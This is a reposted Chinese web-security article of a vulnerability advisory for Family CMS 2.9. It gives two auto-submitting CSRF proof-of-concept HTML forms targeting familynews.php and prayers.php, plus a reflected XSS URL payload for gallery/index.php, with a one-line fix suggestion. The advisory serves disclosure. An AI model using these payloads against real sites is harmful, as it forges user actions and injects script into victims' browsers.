网站地图    收藏   

子栏目

主页 > 后端 > 网站安全 >

Family CMS 2.9及更早版本的多个缺陷及修复 - 网站安

来源:自学PHP网    时间:2015-04-17 13:03 作者: 阅读:

[导读] 标题: Family CMS 2.9 and earlier multiple Vulnerabilities下载地址:http://sourceforge.net/projects/fam-connections/files/Family%20Connections/2.9/FCMS_2.9.zip/download作者: Ahmed Elhady M......

标题: Family CMS 2.9  and earlier multiple Vulnerabilities
下载地址:http://sourceforge.net/projects/fam-connections/files/Family%20Connections/2.9/FCMS_2.9.zip/download
作者: Ahmed Elhady Mohamed www.2cto.com ahmed.elhady.mohamed@gmail.com
影响版本: 2.9
测试系统平台: ubuntu 11.4
===================================================================================
提示:
    *****First we must install all optional sections during installation process.*****     
          
1- CSRF缺陷 :
 
    POC 1: Page "familynews.php"
         
       
        <html>
            <head>
                <script type="text/javascript">
                    function autosubmit() {
                        document.getElementById('ChangeSubmit').submit();
                    }
                </script>
            </head>
            <body  onLoad="autosubmit()">
                <form method="POST"  action="http://[ www.2cto.com ]/FCMS_2.9/familynews.php"  id="ChangeSubmit">
                    <input type="hidden"  name="title"  value="test" />
                    <input type="hidden"  name="submitadd"  value="Add" />
                    <input type="hidden"  name="post"  value="testcsrf" />
                    <input type="submit" value="submit"/>
                </form>
            </body>
        </html>
     
     --------------------------------------------------------------------------------------------------------
        
     POC 2:页面 "prayers.php"
        
 
          <html>
        <head>
            <script type="text/javascript">
                function autosubmit() {
                    document.getElementById('ChangeSubmit').submit();
                }
            </script>
        </head>
        <body  onLoad="autosubmit()">
            <form method="POST"  action="http://[localhost]/FCMS_2.9/prayers.php" id="ChangeSubmit">
                <input type="hidden"  name="for"  value="test" />
                <input type="hidden"  name="submitadd"  value="Add" />
                <input type="hidden"  name="desc"  value="testtest" />
                <input type="submit" value="submit"/>
            </form>
         
        </body>
        </html>
----------------------------------------------------------------------------------------------------------------------------
2-反射型 XSS
    
    POC :   http://[localhost]/fcms_2.9/gallery/index.php?uid=%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E
 

修复:加强过滤和验证

最新评论

    加载更多~~

    添加评论

    更多文章推荐

    自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

    京ICP备14009008号-1@版权所有www.zixuephp.com

    网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

    添加评论